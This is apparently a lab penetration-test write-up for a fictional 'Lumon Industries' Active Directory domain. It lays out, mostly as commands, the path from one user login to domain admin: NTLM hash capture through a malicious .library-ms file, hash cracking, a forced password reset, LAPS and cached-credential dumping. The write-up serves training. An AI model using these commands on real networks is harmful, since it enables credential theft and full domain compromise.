Objective / Scope

Lumon Industries will soon be integrating a high-value employee into the organization. In accordance with internal security protocols, a comprehensive penetration test and internal access verification must be conducted prior to full onboarding.

For this assessment, valid credentials were provided for a standard domain user. The goal was to understand what level of access this account truly had, identify any escalation paths, and determine whether internal controls would prevent an attacker from moving laterally or escalating privileges.

Starting Credentials

1

hellyr:H3lenaR!2025

Reconnaissance & Information Gathering

Host Resolution

To ensure consistent hostname resolution during testing, the following entries were added locally:

1
2
3
4

sudo tee -a /etc/hosts << 'EOF'
10.0.23.195 DC01
10.0.16.195 INTRANET
EOF

A reusable target list was also created:

1
2
3
4

cat << 'EOF' > targets.txt
10.0.23.195
10.0.16.195
EOF

Network Scanning (Nmap)

An initial full port scan was performed to identify exposed services:

1

nmap -Pn -p- -sC -sV -iL targets.txt --open -oA nmap/scan.nmap --min-rate 3000

Based on service banners and responses, the Active Directory domain was identified as:

1

lumons.hacksmarter

For completeness, the following FQDNs were also noted:

1
2

DC01.lumen.hacksmarter
INTRANET.lumen.hacksmarter

SMB Enumeration

With valid credentials and SMB available on both hosts, share enumeration was performed using nxc:

1

nxc smb targets.txt -u 'hellyr' -p 'H3lenaR!2025' --shares

Most shares were standard administrative or system shares. One share on INTRANET stood out:

1

MDRepo          READ,WRITE

This writable share presented an opportunity for credential capture.

Initial Exploitation – NTLM Capture via Writable Share

The MDRepo share allowed arbitrary file uploads. In real environments, attacks relying on user interaction often require patience. In this lab environment, interaction occurred quickly.

After initial manual attempts, a public proof-of-concept was used to generate a malicious file:

1

python3 CVE-2025-24054_CVE-2025-24071-PoC/exploit.py 10.200.30.11 -s share

1

File xd.library-ms successfully generated, pointing to \\10.200.30.11\share

The file was uploaded to the share:

1
2
3

smbclient.py hellyr@INTRANET
# use MDRepo
# put xd.library-ms

Responder was started to capture authentication attempts:

1

responder -I tun0

After a short period, NTLMv2 credentials were captured.

Captured NTLMv2 hash from MDRepo interaction

Credential Cracking

The captured hash was cracked using Hashcat:

1

hashcat harmonyc.hash /usr/share/wordlists/rockyou.txt

Cracked Harmonyc Hash

The recovered account belonged to a manager but did not immediately provide administrative access.

Secondary Enumeration & Credential Capture

While reviewing files in the MDRepo share, a PDF referencing an internal intranet portal was discovered. Logging into the portal confirmed that the compromised user had managerial access.

Intranet Login

The admin interface allowed browsing a file share. Reusing the previously established SMB listener triggered another NTLM authentication attempt, this time from a service account.

Captured NTLMv2 hash from Intranet

The new hash was cracked:

1

hashcat intranetsvc.hash /usr/share/wordlists/rockyou.txt

Intranetsvc Hash Crack

Lateral Movement Analysis

Direct access attempts via SMB, RDP, and WinRM did not immediately succeed. At this point, directory-level analysis was required.

BloodHound Collection

1

nxc ldap 10.1.6.124 -u 'hellyr' -p 'H3lenaR!2025' -d lumons.hacksmarter --dns-server 10.0.23.195 --bloodhound --collection All

Privilege Relationship Analysis

The following query was used to identify high-impact permissions:

1
2
3
4

MATCH p=(n:Base)-[r:GenericAll|GenericWrite|WriteOwner|WriteDacl|ForceChangePassword|AllExtendedRights|AddMember|AllowedToDelegate|AllowedToAct|AdminTo|CanPSRemote|CanRDP|ExecuteDCOM|AddSelf|DCSync|ReadLAPSPassword|ReadGMSAPassword|DumpSMSAPassword|AddAllowedToAct|WriteSPN|AddKeyCredentialLink|SyncLAPSPassword|WriteAccountRestrictions|WriteGPLink|ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13]->(:Base)
WHERE (n:User OR n:Computer)
RETURN p
LIMIT 1000

The INTRANETSVC account was able to force password changes for multiple users, including MARKS.

Force Change Password

Privilege Escalation – Password Reset and LAPS

The password for MARKS was reset:

1

bloodyAD --host 10.0.23.195 -d 'lumons.hacksmarter' -u 'INTRANETSVC' -p '<REDACTED>' set password "MarkS" "Password1"

1

[+] Password changed successfully!

Because MARKS was a member of the LAPS administration group, local administrator credentials could be retrieved:

1

GetLAPSPassword.py lumons.hacksmarter/marks:Password1 -dc-ip 10.0.23.195

1

INTRANET$  localadmin  <REDACTED>

Lateral Movement via RDP

1

nxc rdp 10.0.16.195 -u 'localadmin' -p '<REDACTED>' --local-auth

1

xfreerdp /v:10.0.16.195 /u:localadmin /p:<REDACTED>

Local Admin RDP

Domain Compromise

To validate domain-level impact, cached credentials were dumped:

1

secretsdump.py 'lumons.hacksmarter/marks:Password1@INTRANET'

Secrets Dump

The recovered DCC2 hash was cracked:

1

hashcat hellye.hash /usr/share/wordlists/rockyou.txt

1
2

Status...........: Cracked
Hash.Mode........: 2100 (DCC2 / MS Cache v2)

With Domain Admin credentials recovered, access to the domain controller was established:

1

xfreerdp /v:10.0.23.195 /u:hellye /p:'<REDACTED>'

Domain Admin

Final Assessment Summary

This assessment demonstrated how a single set of valid credentials could be leveraged to achieve full domain compromise through a series of small but compounding misconfigurations:

  • Writable SMB shares
  • NTLM credential capture
  • Over-permissioned service accounts
  • Excessive password reset rights
  • Broad LAPS access
  • Cached credential exposure